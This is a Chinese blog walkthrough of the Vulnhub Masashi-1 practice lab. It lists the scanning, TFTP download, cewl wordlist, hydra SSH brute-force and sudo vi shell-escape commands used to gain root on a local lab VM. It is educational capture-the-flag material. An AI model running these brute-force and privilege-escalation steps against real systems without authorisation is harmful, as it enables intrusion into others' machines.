Vulnhub内网渗透Masashi-1靶场通关

文章详细描述了一个渗透测试过程,涉及从下载VMDK文件,使用ARP和Nmap进行主机发现和端口扫描,到发现并利用Web服务漏洞、SNMP信息获取、TFTP文件操作,最终通过密码破解和权限提升达到目标。靶场相对简单,主要展示了基础渗透技巧。
摘要由CSDN通过智能技术生成

完整内容见我的博客xzajyjs.cn

靶场下载地址
下载下来后是 .vmdk 格式,vm直接导入。 M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此


信息搜集

arp-scan -l		# 主机发现,目标位192.168.168.14
nmap -sV -A 192.168.168.14	# 做端口扫描

image-20240229005740557

扫描结果为2280端口开放,接下来对80端口进行分析,默认是apache的初始化页面,接下来进行目录扫描。

dirsearch -u 192.168.168.14

扫描结果很不错,有robots.txtsecurity.txt的两个文件,分别访问一下

image-20240229010722307
# robots.txt
User-agent: *
Disallow: /
		/snmpwalk.txt
		/sshfolder.txt
		/security.txt

--------------------
# security.txt
If its a bug then let me know on Twitter @lorde_zw :)

--------------------
# snmpwalk.txt
|	403:
|		Name: cron
|		Path: /usr/sbin/cron
|		Params: -f
|	768
|		Name: tftpd
|		Path: /usr/sbin/tftpd
|		Params: -- listen user tftp -- address 0.0.0.0:1337 -- secure /srv/tftp
|	806
|		Name: mysqld
|		Path: /usr/sbin/mysqld
|		Params: -i 0.0.0.0

---------------------
# ssh_folder.txt

image-20240229011232924

从这些信息中可以获得存在ssh的一个用户名为sv5,并且在/srv/tftp目录下有id_rsaid_rsa.pub文件

根据snmpwalk.txt文件得知:

进程403的名称是cron,路径是/usr/sbin/cron,参数是-f。
进程768的名称是tftpd,路径是/usr/sbin/tftpd,参数是--listen user tftp --address 0.0.0.0:1337 --secure /srv/tftp。
进程806的名称是mysqld,路径是/usr/sbin/mysqld,参数是-i 0.0.0.0。

"snmpwalk"是一个用于通过SNMP协议获取设备信息的命令行工具。在这种情况下,"snmpwalk.txt"文件可能包含了通过SNMP协议获取的关于系统中运行进程的信息。这些信息通常用于监视和管理网络设备和服务器。


渗透过程

根据tftpd以及srv/tftp中的文件可知,可以尝试连接tftp服务,并且把两个密钥文件下载下来

tftp 192.168.168.14 1337
get id_rsa
get id_rsa.pub

image-20240229012527515

image-20240229012626904

查看这两个文件发现被耍了,并不是真正的私钥和公钥,但提示我们了使用cewl这个工具

cewl这个工具是一个类似爬虫的工具,可以爬取网站内容以获取字典文件。

cewl -n 192.168.168.14 -w pass.txt

接下来就没有什么突破口了,用这个密码字典去破解sv5用户的密码

hydra -l sv5 -P pass.txt ssh://192.168.168.14

image-20240229012922511

破解出来密码是whoistheplug,ssh连接上去

image-20240229013002304

sudo -l看一下当前用户可以root权限执行哪些命令

image-20240229013109698

发现/usr/bin/vi /tmp/*是可以免密以root权限执行的,在交互命令输入!/bin/bash就可以执行指令,这里直接进入bash,就可以看到以root权限进去了

sudo /usr/bin/vi /tmp/haha.txt
:!/bin/bash

image-20240229013253139

image-20240229013353588

至此整个打靶过程就结束了


总结

总体来说这个靶场非常简单,用到的知识点也非常少,都是常见的处理手法。

  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值